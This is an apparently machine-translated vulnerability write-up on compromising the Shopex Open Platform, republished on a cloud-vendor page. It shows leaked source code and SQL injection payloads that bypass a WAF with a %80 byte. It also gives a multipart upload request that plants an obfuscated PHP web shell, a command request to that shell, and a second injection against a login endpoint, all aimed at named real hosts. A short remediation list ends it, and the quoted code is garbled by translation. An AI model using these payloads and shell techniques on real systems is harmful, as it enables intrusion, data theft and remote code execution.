Shopex Open Platform SQL injection and Getshell

Source: Internet
Author: User
Tags upload php

Shopex Open Platform SQL injection and Getshell

SQL Injection.

BBScan scanned a git information leak:

http://open.shopex.cn/.git/



Use the rip-git.pl to download the source code.

Source code audit finds an SQL injection:

Open.shopex.cn \ core \ application \ controllers \ docs. php:

/*** API Search list page ** @ access public ** @ return void */public function api_search ($ category_id) {$ this-> data ['navigations '] [] = array ('name' => 'development document', 'url' => ''); $ this-> data ['navigations '] [] = array ('name' => 'api document', 'url' => site_url ('/docs/api_list /'. $ category_id); $ platform_id = isset ($ _ GET ['Platform _ id'])? $ _ GET ['Platform _ id']: 0; $ docs_keyword = isset ($ _ GET ['docs _ keyword'])? Trim (urldecode ($ _ GET ['docs _ keyword']): ''; $ method_type_id = isset ($ _ GET ['method _ type_id '])? $ _ GET ['method _ type_id ']: 0; /***** change the layout of the Development document page */$ this-> Layout-> layout ('doc _ details');/***** load the API list model, and get the API List Data */$ this-> load-> model ('method _ type_model '); $ api_list_data_temp = $ this-> method_type_model-> get_api_list_all (); foreach ($ api_list_data_temp as $ k => $ v) {$ api_list_data [$ v ['id'] = $ v ;} $ this-> data ['api _ list_data '] = $ api_list_data; /***** supported platform list */$ this-> load-> model ('Platform _ model'); $ plat Form_list = $ this-> platform_model-> get_platform_list (); $ this-> data ['Platform _ list'] = $ platform_list; /***** condition filtering */$ conditions = '1 = 1'; if ($ platform_id> 0) {$ conditions. = 'AND pm. platform_id = '. $ platform_id;} if ($ docs_keyword! = '') {$ Conditions. = 'AND (m. name like "% '. $ docs_keyword. '% "OR m. introduction like "% '. $ docs_keyword. '% ")';}/*** filter on the left using */$ this-> load-> model ('method _ model '); $ filter_method_list = $ this-> method_model-> get_method_search_list ($ conditions); // interface list $ method_type_id_array = array (); foreach ($ filter_method_list as $ k => $ v) {$ method_type_id_array [] = $ v ['method _ type_id '];} if ($ method_type_id> 0) {$ conditions. =' AND mthm. method_type_id = '. $ method_type_id;}/***** load the API model */$ this-> load-> model ('method _ model '); $ method_list_temp = $ this-> method_model-> get_method_search_list ($ conditions); // interface list foreach ($ method_list_temp as $ k => $ v) {$ temp = isset ($ api_list_data [$ v ['method _ type_id '])? $ Api_list_data [$ v ['method _ type_id '] ['name']: 'temp'; $ method_list_group [$ temp] [] = $ v ;} $ this-> data ['method _ list_group '] = $ method_list_group; $ this-> data ['method _ type_id_array'] = $ method_type_id_array; $ this-> data ['docs _ keyword'] = $ docs_keyword; $ this-> data ['Platform _ id'] = $ platform_id; $ this-> data ['category _ id'] = $ category_id; $ this-> data ['method _ type_id '] = $ method_type_id; // current list ID $ this-> layout-> view ('docs/api_search ', $ this-> data );}



Three parameters have SQL injection:

platform_id docs_keyword method_type_id



You can find that you have submitted the following information:

WooYun: Shopex SQL Injection somewhere on the Open Platform

WooYun: an SQL injection vulnerability exists on Shopex's official platform.

WooYun: ShopEx injection to a substation

The vulnerability is not fixed, but is on waf.

The program is a CI framework, and the UTF-8 characters in the parameters are filtered out by default. Therefore, you can insert a % 80 keyword to bypass waf.


 

http://open.shopex.cn/docs/api_search/1?platform_id=1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23


 


 



Continue to flip the code and find an arbitrary file to upload:

Open.shopex.cn \ core \ application \ controllers \ uploads. php:

Class Uploads extends CI_Controller {/*** homepage image Upload ** @ access public */public function home_img () {if (empty ($ _ FILES ['image']) {$ this-> _ return_msg ('fail ',' the format of the uploaded content is incorrect! ');} If (substr ($ _ FILES ['image'] ['type'], 0, 5 )! = 'Image') {$ this-> _ return_msg ('fail ',' check whether the image is uploaded! ');} $ Image_name = $ _ FILES ['image'] ['name']; $ image_name_exp = explode ('. ', $ image_name); $ image_name = date ('ymdhis '). mt_rand (0, 1 ). '. '. $ image_name_exp [1]; $ uploadfile = FCPATH. 'uploads/home_img /'. $ image_name; move_uploaded_file ($ _ FILES ['image'] ['tmp _ name'], $ uploadfile ); $ data ['img '] = base_url ('/uploads/home_img /'. $ image_name); $ this-> _ return_msg ('succ', 'success', $ data );}...



Attackers can exploit the php multipart/form-data parsing vulnerability to bypass waf and upload php shells:
 

POST /index.php/uploads/home_img HTTP/1.1User-Agent: curl/7.33.0Host: open.shopex.cnAccept: */*Proxy-Connection: Keep-AliveContent-Length: 341Content-Type: multipart/form-data; boundary=----,xxoo------,xxooContent-Disposition: form-data; name="image"; filename="1.jpg"Content-Type: image/png------Content-Disposition: form-data; name="image"; filename="1.php"Content-Type: image/png<script language="php">@preg_replace('/./e','@'.str_rot13('riny').'(bas'.'e64_decode($_POST[c]))', 'x');</script>------------,xxoo--



Shell:

http://open.shopex.cn/uploads/home_img/201512122130440.php

 

POST /uploads/home_img/201512122130440.php HTTP/1.1User-Agent: curl/7.33.0Host: open.shopex.cnAccept: */*Proxy-Connection: Keep-AliveContent-Length: 34Content-Type: application/x-www-form-urlencodedc=ZWNobyBgaWQ7cHdkO2xhc3QgLTIwYDs=

 



There is also an SQL injection:
 

POST /index.php/passport/passport/login HTTP/1.1Host: 122.144.135.142Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=368fe31461cc0ba9a3e38c0334145b35; CNZZDATA3868185=cnzz_eid%3D1466070748-1449902718-%26ntime%3D1449902718Content-Length: 131biz_id=&entid=')or updatexml(1,co%80ncat(0x7e,us%80er(),ver%80sion()),1)#&pwd=xx&auth_code=cqac&subOk=%E7%99%BB%E5%BD%95&logOk=true


 


 

 

Solution:

Delete the. git directory or prohibit access;

Fix SQL injection .;

The upload function limits suffixes and user permission control.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.